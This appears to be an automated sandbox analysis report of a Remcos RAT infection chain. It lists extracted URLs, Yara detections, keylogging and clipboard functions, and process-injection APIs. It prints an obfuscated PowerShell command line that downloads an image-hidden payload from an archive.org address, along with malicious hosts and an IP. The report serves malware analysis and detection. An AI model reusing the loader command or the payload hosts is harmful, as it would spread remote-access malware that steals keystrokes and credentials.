                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                    Source: powershell.exe, 0000000B.00000002.393985624.00000000023AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                    Source: powershell.exe, 0000000B.00000002.396943694.0000000005173000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.393651562.0000000000490000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.396943694.0000000005200000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.393985624.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                    Source: powershell.exe, 00000009.00000002.398949438.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_LR
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                    Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: RegAsm.exe, 0000000D.00000002.405468738.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405476161.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.405464101.0000000002B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
                    Source: rXgoN[1].htm.0.drString found in binary or memory: https://zeep.ly/rXgoN
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                    Source: unknownHTTPS traffic detected: 95.217.202.210:443 -> 192.168.2.22:49166 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000012_2_0040A2F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004168FC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00406DFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00406E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_004068B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_004072B5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_0040A41B
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041CA73 SystemParametersInfoW,12_2_0041CA73

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Microsoft Office drops suspicious files
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\rXgoN.urlJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\gvt on 85.239.241.184.urlJump to behavior
                    Very long command line found
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9286
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9286Jump to behavior
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_0041812A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,12_2_0041330D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,12_2_0041BBC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041BB9A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004016FD NtdllDefWindowProc_A,14_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004017B7 NtdllDefWindowProc_A,14_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00402CAC NtdllDefWindowProc_A,15_2_00402CAC
